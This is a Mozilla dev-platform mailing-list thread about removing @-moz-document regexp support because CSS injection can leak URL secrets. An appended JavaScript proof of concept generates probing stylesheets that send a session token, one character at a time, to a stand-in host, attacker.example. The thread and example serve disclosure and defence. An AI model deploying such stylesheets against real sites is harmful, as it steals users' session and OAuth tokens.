On 2014-07-08, 6:34 PM, L. David Baron wrote:
On Monday 2014-07-07 15:18 -0400, Ehsan Akhgari wrote:
That seems pretty bad. I think we should at least stop supporting
it for Web content. David, what do you think?
I'm ok with restricting it to UA and user style sheets, although if
we're going to do that because of security risks I'd like to get a
good understanding of what those are and of what we do and don't
expect authors to do when sanitizing CSS from untrusted sources to
include in their Web content.
I think it might make more sense to continue discussion in the bug.
Sounds great!
(I also think sending this out in the format of an
intent-to-implement message was confusing for an initial proposal to
do something that hadn't yet been discussed with any owners or peers
of the module. I think the format is intended to say that a change
has already been accepted by owners/peers but requires wider
review.)
Yes indeed. Admittedly I was a bit confused.
Summary:
Attackers can extract secret URL components (e.g. session IDs, OAuth
tokens) using @-moz-document. Using the regexp support and assuming a
CSS injection (no XSS needed!), the attacker can probe the current URL
with some regular expressions and send the URL parameters to a third party.
A demo of this exploit can be found at <http://html5sec.org/cssession/>.
This attack has also been published in the academic paper "Scriptless
Attacks: Stealing the pie without touching the sill"[1] by Mario
Heiderich et al. and numerous other presentations on this topic [2,3].
My suggestion is to either kill -moz-document for public web content or
remove regexp support.
What do you think?
Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1035091
Spec: n/a. This was pushed out of CSS3 and did not make it to CSS4
selectors.
MDN: https://developer.mozilla.org/en-US/docs/Web/CSS/@document
Target release: ??
Platform coverage: desktop, Android
[1] http://www.nds.rub.de/research/publications/scriptless-attacks/
[2] http://www.slideshare.net/x00mario/stealing-the-pie
[3] https://speakerdeck.com/mikewest/xss-no-the-other-s-cssconf-eu-2013
_______________________________________________
dev-platform mailing list
[email protected]
https://lists.mozilla.org/listinfo/dev-platform
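The probing attack summarized in the proposal above, worked through as an added example (this code is not from the thread, the html5sec.org demo, or the cited paper). The victim URL, the parameter name `sid`, the attacker host `attacker.example` and the token value are all constructed for the demo. `simulateBrowser` is a stand-in for Firefox's behaviour: a `@-moz-document regexp()` block applies only when the expression matches the entire document URL, and an applied `background-image` triggers a request the attacker can observe. Each round assumes the attacker can get a fresh stylesheet injected (or the page re-rendered), which is the CSS-injection premise of the thread:

```javascript
// Added example: character-by-character URL probing via @-moz-document regexp().
// Everything below (hosts, parameter name, token) is constructed sample data.

// Escape a literal so it can be embedded in a regular expression.
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Quote a string as a double-quoted CSS string token.
function cssString(s) {
  return '"' + s.replace(/\\/g, "\\\\").replace(/"/g, '\\"') + '"';
}

// Build one probing stylesheet: one @-moz-document block per candidate next
// character. A block applies only if its regexp matches the *whole* document
// URL, so at most one candidate's background-image request reaches the
// attacker; the cascade therefore never has two competing winners here.
function buildProbeSheet(paramName, knownPrefix, alphabet, exfilBase) {
  return alphabet.map((ch) => {
    const pattern = ".*[?&]" + escapeRegExp(paramName) + "=" +
      escapeRegExp(knownPrefix + ch) + ".*";
    const leak = exfilBase + "?p=" + encodeURIComponent(knownPrefix + ch);
    return "@-moz-document regexp(" + cssString(pattern) + ") {\n" +
      "  body { background-image: url(" + cssString(leak) + "); }\n}";
  }).join("\n");
}

// Stand-in for the victim's browser (hypothetical, not Firefox's engine):
// parse the sheet, apply every block whose regexp matches the full URL, and
// return the URLs the applied background-image declarations would fetch.
function simulateBrowser(sheet, documentUrl) {
  const fetched = [];
  const block = /@-moz-document regexp\("((?:[^"\\]|\\.)*)"\) \{\s*body \{ background-image: url\("((?:[^"\\]|\\.)*)"\); \}\s*\}/g;
  let m;
  while ((m = block.exec(sheet)) !== null) {
    const pattern = m[1].replace(/\\(.)/g, "$1"); // undo CSS string escaping
    const url = m[2].replace(/\\(.)/g, "$1");
    // regexp() must match the entire URL, hence the explicit anchors.
    if (new RegExp("^(?:" + pattern + ")$").test(documentUrl)) fetched.push(url);
  }
  return fetched;
}

// Attacker loop: recover the parameter one character per injected sheet.
// The attacker's "server log" is simply the list of URLs the browser fetched.
function extractParam(documentUrl, paramName, alphabet, maxLen, exfilBase) {
  let known = "";
  for (let i = 0; i < maxLen; i++) {
    const sheet = buildProbeSheet(paramName, known, alphabet, exfilBase);
    const hits = simulateBrowser(sheet, documentUrl);
    if (hits.length === 0) break; // no candidate extends the prefix: value ends here
    known = new URL(hits[0]).searchParams.get("p");
  }
  return known;
}

// Constructed sample data for the demo.
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789".split("");
const EXFIL = "https://attacker.example/leak";                         // hypothetical
const VICTIM_URL = "https://app.example/account?sid=f3a9k1&tab=profile"; // hypothetical

function demo() {
  // Recovers "f3a9k1" without any script running in the victim page.
  return extractParam(VICTIM_URL, "sid", ALPHABET, 32, EXFIL);
}
```

Each round costs one stylesheet of `alphabet.length` blocks and leaks exactly one character, so a 32-character alphanumeric token needs about 32 rounds rather than 36^32 guesses. The practical consequence for anyone sanitizing untrusted CSS (the question raised earlier in the thread) is that `@-moz-document` / `@document` at-rules have to be rejected outright, since a URL-conditional rule plus any fetching property is enough for the oracle; the proposal's two options, dropping the at-rule for web content or removing `regexp()`, both close the channel at the engine.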